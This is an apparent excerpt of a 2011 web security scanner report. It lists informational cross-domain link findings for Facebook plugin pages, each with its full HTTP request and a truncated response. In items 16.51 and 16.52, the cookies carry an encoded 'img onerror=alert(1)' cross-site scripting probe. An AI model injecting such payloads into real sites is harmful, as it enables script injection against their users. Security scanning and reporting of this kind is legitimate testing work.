<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1308392513" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:10pm" data-date="Wed, 04 May 2011 16:10:52 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100002122115800" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187272_100002122115800_7062068_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1385528027" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49461_1247709577_2754_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.47. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650
The response contains the following links to other domains:

Request

GET /plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.43.43
X-Cnection: close
Date: Thu, 05 May 2011 00:58:07 GMT
Content-Length: 94355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/wmoppert" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;c4dbd&quot;, event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:25pm" data-date="Wed, 04 May 2011 16:25:34 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/matthew.oliveira2" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1708077046" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100001547816690" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top Commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Editor-in-Chief/137829579583400" target="_blank">
...[SNIP]...

16.48. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650
The response contains the following links to other domains:

Request

GET /plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.126
X-Cnection: close
Date: Thu, 05 May 2011 01:11:26 GMT
Content-Length: 98347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.49. http://www.facebook.com/plugins/facepile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3feba30ac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3feba30ac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.100.31
X-Cnection: close
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 6668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

16.50. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.112.63
X-Cnection: close
Date: Thu, 05 May 2011 00:57:35 GMT
Content-Length: 11323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.51. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/like.php?href=
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/S_dxvIdYJ4E.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/like.php?href= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.150.57
Connection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 8420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/S_dxvIdYJ4E.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.52. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
The response contains the following links to other domains:
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/50276_100484820802_1716483_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.136.33
X-Cnection: close
Date: Thu, 05 May 2011 12:43:24 GMT
Content-Length: 9003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/iTunes" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50276_100484820802_1716483_q.jpg" alt="iTunes" /></a>
...[SNIP]...

16.53. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29ad2e5e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29ad2e5e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.138.108
X-Cnection: close
Date: Thu, 05 May 2011 01:15:26 GMT
Content-Length: 16148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

